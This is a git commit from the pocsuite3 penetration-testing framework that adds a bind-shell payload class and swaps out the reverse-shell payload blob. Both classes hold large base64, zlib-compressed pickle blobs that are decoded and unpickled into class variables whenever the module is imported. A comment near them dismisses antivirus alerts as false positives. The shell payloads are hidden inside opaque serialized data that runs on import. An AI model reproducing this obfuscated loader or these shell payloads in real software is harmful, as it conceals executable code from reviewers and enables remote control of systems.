feat: add bind/reverse shell payload (#311)

knownsec · Aug 3, 2022 · 0f7b08e · 0f7b08e
1 parent 6747939
commit 0f7b08e
Show file tree

Hide file tree

Showing 4 changed files with 99 additions and 27 deletions.
diff --git a/pocsuite3/api/__init__.py b/pocsuite3/api/__init__.py
@@ -22,7 +22,7 @@
 from pocsuite3.modules.ceye import CEye
 from pocsuite3.modules.fofa import Fofa
 from pocsuite3.modules.httpserver import PHTTPServer
-from pocsuite3.modules.listener import (REVERSE_PAYLOAD, bind_shell,
+from pocsuite3.modules.listener import (REVERSE_PAYLOAD, BIND_PAYLOAD, bind_shell,
                                         bind_tcp_shell, bind_telnet_shell)
 from pocsuite3.modules.quake import Quake
 from pocsuite3.modules.hunter import Hunter
@@ -39,8 +39,8 @@
            'DEFAULT_LISTENER_PORT', 'load_file_to_module', 'OrderedDict', 'OrderedSet',
            'load_string_to_module', 'single_time_warn_message', 'CEye',
            'Seebug', 'ZoomEye', 'Shodan', 'Fofa', 'Quake', 'Hunter', 'Censys',
-           'PHTTPServer', 'REVERSE_PAYLOAD', 'get_listener_ip', 'mosaic', 'urlparse',
-           'get_listener_port', 'get_results', 'init_pocsuite',
+           'PHTTPServer', 'REVERSE_PAYLOAD', 'BIND_PAYLOAD', 'get_listener_ip', 'mosaic',
+           'urlparse', 'get_listener_port', 'get_results', 'init_pocsuite',
            'start_pocsuite', 'get_poc_options', 'crawl', 'OSShellcodes',
            'WebShell', 'OptDict', 'OptIP', 'OptPort', 'OptBool', 'OptInteger',
            'OptFloat', 'OptString', 'OptItems', 'get_middle_text',

diff --git a/pocsuite3/modules/listener/__init__.py b/pocsuite3/modules/listener/__init__.py
@@ -2,6 +2,7 @@
 from .reverse_tcp import start_listener
 from .reverse_tcp import REVERSE_PAYLOAD
 from .bind_tcp import (bind_shell, bind_tcp_shell, bind_telnet_shell)
+from .bind_tcp import BIND_PAYLOAD
 
 __all__ = ('handle_listener_connection', 'start_listener', 'REVERSE_PAYLOAD',
-           'bind_shell', 'bind_tcp_shell', 'bind_telnet_shell')
+           'bind_shell', 'bind_tcp_shell', 'bind_telnet_shell', 'BIND_PAYLOAD')
diff --git a/pocsuite3/modules/listener/bind_tcp.py b/pocsuite3/modules/listener/bind_tcp.py
@@ -1,5 +1,8 @@
 import os
 import socket
+import zlib
+import pickle
+import base64
 import select
 import telnetlib
 import threading
@@ -129,3 +132,60 @@ def bind_telnet_shell(host, port, user, pwd, check=True):
         start_listener(tn)
     except Exception as e:
         logger.error(str(e))
+
+
+class BIND_PAYLOAD:
+    payload = (
+        b'eJy1GE1v28g1200/4EOBntrexqxjky1NyW52E4eWW0WWd7VrS4KkNAmygUFRI4sx'
+        b'NWQ5QzuOLKCXXgpdCqj/oP+wQM99b2YoUzLtJC3KIDLnfX/Ne8P5y8N//PxXD+Qz'
+        b'nZuzh83WYX0++yeLBpRsU7LFRxV/FISD0ziJfMq5w2PvkplGqR+wEh8ZlsuocPyE'
+        b'eoJ2aXJBE3OYMl8EETP9MKBMWJOJenHiIKYmHzlcDAJmueotSjVCU2swTZJl8HRq'
+        b'OWHABQXlk/LUsLbmsx81a/PZL5lPtkOyHRMAo83atPnsx91Wrdqbz5o88j1BerX2'
+        b'9nGj26s3nwGlndCUU28wSOxhlJyT+qt67ZlmtWNxZSsjbE4FDwY2D84CJmzuMTqf'
+        b'ffldtz1/9bNfPHiw/+iPJPbOqPypMz8Cz84qRiqG208N8uhgbUEQjOMoERXjnXfh'
+        b'OUHk/DZD38aGHjtzEjoMqS+cWsS4SFJfRMkncpxQMYoG92jHjHUj/5yKe4hSEYRO'
+        b'1/cYo5ni9TUCT5z2w8AnXHgC/nRFAh6ThELmOYWVqSFgtEUmkgOfhIo0YYTRS83y'
+        b'PIWqgmpBOkezm5YjIoU2LVfyTtdA9dr+t72TYzBBBCKkB9+lXJCjKCFHKdsvKdja'
+        b'/vPW4Wv4c9TqnJCTeu/b1mHFaLe6PYM0qyf1igFZHhukWus1Ws2K8RvjQMrfbzTb'
+        b'L3qk97oNJIK+Fxm5Px4PPkYzhl1ikAsvTGnF8MS5QUbBYEBZARtP++MAGP9UPX4B'
+        b'y6PwCoTvl9BaDK1k8EOPcwwP9caQdkYx6QT0UTbgpDcC+CAX0gaLU6GoCb9wF/BW'
+        b'Km4QInbXFpgV0eayBHuVM58/fMQogP1/QSpL6hYYEQMG9WXQ6Y1mXTQXUTAgScrM'
+        b'VdHP0+GQJnTQARdpQj54IIqlYegWUr1MAgFUo3dJIZlIrlbE46NkQv0t6zIRlAuE'
+        b'hmpfLcu9JUirzUlS9khJ+RBqsA5OkSh/5CWkL6W8eauFIuzN05293be36aEFkZCy'
+        b'MzG6jbuENk2JaSo8CPvgOVgxppJvk7KtVTmKxLLIASmvZiLnpXOJDuT5NeNt5RnH'
+        b'MEz5yCwgmC5BpgQasj8iZv29T2McFoSuGjL9hJwGQ2JCXtdVFViFZkEY/DDC5lIQ'
+        b'T+DHdN4rAP0qlPB5XkzXbn51j4xwxxjfRII0I0YNN48bQja7NPYSD5tARYMd2Wxa'
+        b'QzMbI0dA5vCMrga1o418HkUh9RgJ+MuAKRB6uyTWoX9OvZCbxg8/GFbecsmEuzlJ'
+        b'qe7DhIacFpAMQUBGk7cfeyOgE1BBuXDOqGiD0jHFHaEap3VjlSTWSSCbm5J5YRw2'
+        b'1iXrtAZ/PLhTgezeVq711WRvhQ774QMwyZUDE6EJDGZueBkUujRLO84Z80IHYvzO'
+        b'yO/b3DAmAwrSYPPnYRWlAY05vI3O108BN6RRVH08ZAX9kJoY+xxDq/8OmjaJQEcR'
+        b'L3SOBqw85i+VqToLED6KLouMU+ilAPj0PaTG1kF+89aRUyknMkNg/PkNGNMoa2J1'
+        b'ByCZbm0Z6+RmIZtm/0pQgO7t2WSnLH+g1zz+Gl924Ge3LN+mYFUx4+MnNvn6CeJB'
+        b'2TQ3gFaL9vPsQbF7T1H3V/CzgzY9wRdclR/fYw4Q7O0VmLOazIBdROe4SzA/jlqZ'
+        b'kU1MhbekrfkqbqtDONGHceA0NcjSwnJ5Umc3wv3MWwUws5M81EFu7pmW5cCB+JCG'
+        b'wViOLWgKVSOXd9msuO+MPN6EMwmM8D/gkqn3Z4C/oQX4UsecftpO5yNKw8K9Pooi'
+        b'OPPdtdslNm8rzsk4gsMssDSYoGcw9KDncQoLs1iGJF/a7LdHjjamO6Jh2PZWh/Cd'
+        b'O0CyZjxLpfdZ1b86fApq+9M0fayuVxStLS1zjXQHNNzTSgU996OuA6fX241USrq/'
+        b'me5kDWvnrnaKLkn14JMej7JZ2Zh/9brqTJGe+/uuDKn8WCJc/YFNpwBWsbh8K5aV'
+        b'aatazG/klUj+DyPpEyL5GWPpjhh9PET/3XjC5/8wovC5r1Xe1W6XZsJiH63WkKnJ'
+        b'lj6l7mqqtq4aROS/DaDdWg4EJBGr8SgUfyNkRXpO78fFf+zAmh1R8Wu/3anrz9hH'
+        b'Fez9CCtJ4H5Jf2qX1Fd54/DZ2nz2k/Zr+OZuzmf/iq8gY4xs+2RL3SjoENgRt+Ez'
+        b'WFvs8op2Sv3JXKwenTaa9Z6tl91W7fvTbq9Tr55YLnf6ARuYplF25D/DnpSnFsL1'
+        b'zdBXluvbXoU7no8Ogu8RdwZpvGv6Dp58WQQxKxdCdwqhu5YbV26MdnwvDM03i9sv'
+        b'29gOjLd4FfWwXe8cz2f/jmkSyoszmKW6b7gbcQXsdLWfXbutXcz5ZkP+QIeI+lcM'
+        b'978h/Bi3ufS3K4OBV1WnATM3Yps0mtXDw85ptfkaaLTvXZB3Un1VazWblgt9xES9'
+        b'Og41uwuRwYlMatZkEsVI3ztsNG3jYLMGkzODtF70VkH1TicDwb7z9dVf3+MjAs7j'
+        b'xZwL/n/Z/rY9f7X+xYMH8Sgm2wnZ2sgSfKpuB81qgdvd1vFpr9a2dHBOpb8b3F7O'
+        b'cIbVngIesrXhh5kC7eUG9AD5FWzugJPB0FzXePUdCwy2sUEMSKpF3weQl4BlEuSH'
+        b'MhLA8EXR40EllgEwgAjSnBiZ6PUhjYYmUligZGNcGULqfAVwb+nbGNvQA0M0emxh'
+        b'rKZTLJbOi+ev57O/JWn/CmKl5wpWDdqFBwm8koQdAqFRl6rYQPW9p7bDX1T5AgJG'
+        b'+9gIIAyNlqPsB6C0fjK5DqJr34kTPBvBhyN6PJ1SNnDhPyawWdudz46SMSmJcVwa'
+        b'uuPzYTCMshVeoKrXa138kH2ye7C5cy3vXy/U9euBogFx1Zffz2d/9y7Pydbz+jeN'
+        b'5mTCK0YpYFSUoLZLQFwql8qGO4hkqkx+vQmmh0BAfGu/Urb6YOG5CygfjFcemv6C'
+        b'yDooW8qXjfL1JlfFDaQYYaLjsV4xMJ6GpZDcksH/aa9+DGV4OJ/9WtAQ7Bng9fHC'
+        b'KemHDMfv57NzCMd2MiwMyfX1+JzB4FIrErtm/iL6WoUFX63y/nLkdJBk9NxFwOez'
+        b'Lzrz2V87WAcG399WVaFHAF6ny8tZvLnuh4DCe+Ze50Xd5rJA1DumvLKV/G4rqwmE'
+        b'YviwII8hbNzEvKs3eb1+s8RNZVk2RsmYp85/AMfBUyk='
+    )
+    vars().update(pickle.loads(zlib.decompress(base64.b64decode(payload))))
+    del payload
diff --git a/pocsuite3/modules/listener/reverse_tcp.py b/pocsuite3/modules/listener/reverse_tcp.py
@@ -335,30 +335,41 @@ class REVERSE_PAYLOAD:
     # Pocsuite3 is an open source security tool, not virus.
     # I believe that this is a false positive of your antivirus tool :)
     payload = (
-        b'eJx9Vd9v4kYQTntpT7r3vlYji4O1agwBcQ9xQCIcadJSQJjr9YQQMvYSfAF7612a'
-        b'IEBq3/3oPvbP6kv/if4LnfUPQkhUkOzd8cw33zeeWf9++mfj9Un820Uk/LLbisJ2'
-        b'sISSWLLSzFjezdyZn+1sS6TLbWnqeiU+h6ILlUb+bOvZsCnvYHO2g0biEoWvuq1K'
-        b'FH6Dj4oUsoDUK35ajcIzzFWcJagM03m+k26AQT4PB7jlxB6FX102zetyFH6b5G/k'
-        b'oeTQ30rCZiX0LcW+yCkKT6VjFJKpJT1tKPx/QCGFRtLvjkLyt8LIW0tmvBC5fyYB'
-        b'vh62O932EBGeCIPnygRdeFQ8V3fabw86Ufg3o8FCFq6w4hRM376jwsi5dQUDFCPH'
-        b'6hhk8NhMTK1/NbnBtJrZa/04MYeDdvMn7ZYKFvjCn649a0mJgqQVVTXcGbF9z6O2'
-        b'jJMAluMEE9cjOaa5yGhiCR83roq/zcZn1CPm8P1NV1MaeVNRjczS+zA8NrUHg8xE'
-        b'H6hNlMcuQdNuZ8gC9T8Nr3vdKPyHrcXc9+Iiu0vmBwISORpfTZG4TTnXfG7wemLW'
-        b'U7HprpkqTrcHwlWD65lCEpdLw1qhcp/rzopVCNdn7oJ6PlG1smrAC+azl80V1WD1'
-        b'R3a6bS0WZJSpVDQFdY5VqfJV/7ofhe/ZnEExgEJOsqzP5DWu1SOrZ4WCi3wVO7Qq'
-        b'x6qqxGCngw+Xn6LQDlbTNcIlirE1CrP6sNVPWkM/wtWFP3FjcOAscD0xO0ry1sEs'
-        b'eKnIq6LN5F+VyX5o/tyMwr8CqMNg5Ql3SXXspHRJ1DcMHwR6TDuVLmdFirfxEmes'
-        b'XTSOxyQ+Oy7yNdjC/RzrCQG1HFhgwxng+JCTK8mlhqxq0uRRZQwWB1Mg+9vRGBPr'
-        b'95YrrvyAqFH4pt/72B6Y1+1OJ/rl3y9OTnL2wqWeQHJdel/sTT/j6wdzzQVd6l3Z'
-        b'IHGZuI4Va8WepIDUCslLyHGBfJYYnMLo31NhxjaiGqPpWtDReJyTd45OZV1/V6tV'
-        b'a9u3G8TYGbEigjMjARIofYD6SBKhQVmDZKl3qHcr5qoKRdRbxgEzco4lLAwkB7yL'
-        b'wzWjXZzaTMGQPmDLm62bm7Zn+w5WRE0p4jJLI7O4Ugz1nKll30lQlz5AkkEe01j9'
-        b'3koUkzA4cK3EzLO476DQN6GAd8LuHVXvW2IujQ0opCGYT6KPhORFU0rj8/OYYkzt'
-        b'UlIijwn2RdY/Bq6gZI+DtPfrrDx736vFis+JijXOXkxr4XMqO+B1r9/umiYelX/I'
-        b'ozZIz1r+5JvFt9uDk5cDMw6HIDXGHzA5P5wvgE/SRir+unLlmKVHiTyoz7FZGmmW'
-        b'Jzmjlf4ftlBYwg=='
+        b'eJyVV19z20QQLzTQTqevPMLcaFRLAll2HFzAijwkrksCxvbYLm0n43Fl+ZSI2JLQ'
+        b'nZuY2DPwrkfxyAsfgC/D8MKX4Cuwe5Icx6R0cGak097e7m/39l9+2vnl4uEd8Vsl'
+        b'avxuu5HEzWhGSnwWllxzdu56bpB/OTbPlsvS2PNL7IwUPVKpF3aXvkOuyitytbsi'
+        b'9ZQlie+2G5Uk/gC2ipTkBzIusbuXxLugq+imUkNQ5weT7IOEpFAgG3LLKT2J3zs8'
+        b'6B+Vk/ijVH+9QEoT+rrEnbAEvCXBC5iSeAcZk1gd28jpEOW/DyiZaAD9eOtI4ZSb'
+        b'BXsWmrecXO+hgPcHzVa7OUjiARoWbVh27chwubxpqMnp1Kf82tL9jC932m49t32n'
+        b'2+y1kvjPkEZTdKsyZ5T0A+ecclP2LAlESKYcWiDGZIKs9vXu09ExgNL7ncY3o/6g'
+        b'1zz4Vj+lPIwCHowXvj2jqgQmSZpmeq7qBL5PHTyHAuzJJBp5viqHugcYRzYP4MPT'
+        b'4Hd1FYTUV/uDJ8dtXaoX+pJm5pTOs8E2qdnr5SR6SR1Vuo4hIK1WJrqv+3Jw1Gkn'
+        b'8V/hgp8FvrgCbxYGESepOTqbjwG4QxnTA2YyKyUbmbHZ10Fmcfa5YbhmMiO3UBXu'
+        b'0sFXYHnAjMk8rKjMcL0p9QNV08uaSW4h795OrmhmaF2jMxx7OlVPcislXQI7hxpa'
+        b'ebd71E3iJ+FZCCFCFBlRWi4+ha+uUf3LUWS/sAfxu4dJtycJYTu9Z4cvk/jHaD5e'
+        b'gLjUYhEa9NLjxHOJG0TnpmMNGt00UAyfXmRKJNACYi7OwAjVmU0sx4DAYJp53DFC'
+        b'AQaIuhRJcNlLL1g6Rhh5PkgNjIjak9WK+hPE8PXBdwdJ/GtELNKb+9ybUZSTLVXt'
+        b'QQgbkSGsyTyCCYY+ceCBdFLdr2/nlig4+4UqWRKBkKBOMoU4NMkkIDKu0BNVcEkV'
+        b'ST6VhsRmpM8B5enJEBQbF7bHnwaRqiXxg27nebPXP2q2WsmLv9+5c0d2ph4FcyzS'
+        b'phfFzvh7iArSXzBOZ0Yb40b4ixnguobgVBWApqR3IzMOeGZwOBNjfEV5X9BUzTwZ'
+        b'Lzg9GQ5lfDNgKhvG42p1r7p8dAUyVpnPIZVQQCrK6IF9anpCJ2WdpEujRf1TfqZp'
+        b'pAj2luEqTHlicxsOqhu4i4NFSNuQzLkFA3oJmdBvHB83fSeYgEe0DCIsczWoxUNj'
+        b'4CbHtnOOQj16SVINWNvB+505L6bHyAZrRSDPz31ClG6fKPBWw4uJZnRtfobEOlGy'
+        b'I6APpZ9wxEUzSMNaTUAU0A4RknqtYO1k43nkcaqu5QDs9Tp3z5r36XTOzlQNfJxf'
+        b'TGMaMIoRcK/Tbbb7faigP2/WZ3ajPrMb9ZlBfd5MwIwouh5mCGNTwkZZIBV/mHuY'
+        b'fVmFwYpeg2CpZ1pu6AQ0UAdGiObFQwjGdTlw+CW3UltGIAjdNXLgCxxwIoE6yaqf'
+        b'SK9p5LmLUUhpBN+uPWVU3ySOsKznO8NhnuMys77MRKeVIkOuouBaqZQBlnSZRn6A'
+        b'T+DW98p6Wj1HjdZxsz0YNTrtdrMx0AVW7ASZ9KnlYv0ANUgU+S5PdTmAywksqOPT'
+        b'YAK95oGUkQwL1qYbzsURQVzBTymI8eDTdHjIu+L1EJH1aRgfDtd9urxf2P1srygq'
+        b'JoHVLdUEOAUTVAt8VsQLqte9tGdj278xjZB/jyPbjTpvy4C2msTd/9PzNyebN/f7'
+        b'u61nUFj/mM5ttF+aBtBVCLMiCoEWUVVJL1HRzHSHWzZjNII+aIDlKrQ1Xsu73Ubp'
+        b'Sqspj+YU62h6NNIvLV6LqEO915ArmUA3FwgVP20Ika5Eipbvj/N9t4bFWVU+thWh'
+        b'FbNTHUMH8yemW3PSBEQ02UpK4vs4y4j4j3+7Mc8cd2q1tPTCu9/CeUb0MGxoOkwo'
+        b'cgjB41hbbMU69rUuxP4BzCxWXVrHMmyOstSYQQBa9XKeDmzBBGzZ0WVP/3z3iwrG'
+        b'LVAv0nrj6K9k7xVGJQ6H2GkhSpztVqu4G811q4UbPBh5aVQy0TvdrX7+aALxCI8K'
+        b'PiXdxT8NtN1Hbal3ft9SGOV155Yu34EtOCQ8Ih4bPf/NE4CWz0RvGQXQGvb2eeB+'
+        b'u3EwSLF/6GMT3/gHoFhE5Pm/AXPjH5hWGLM='
     )
-
     vars().update(pickle.loads(zlib.decompress(base64.b64decode(payload))))
     del payload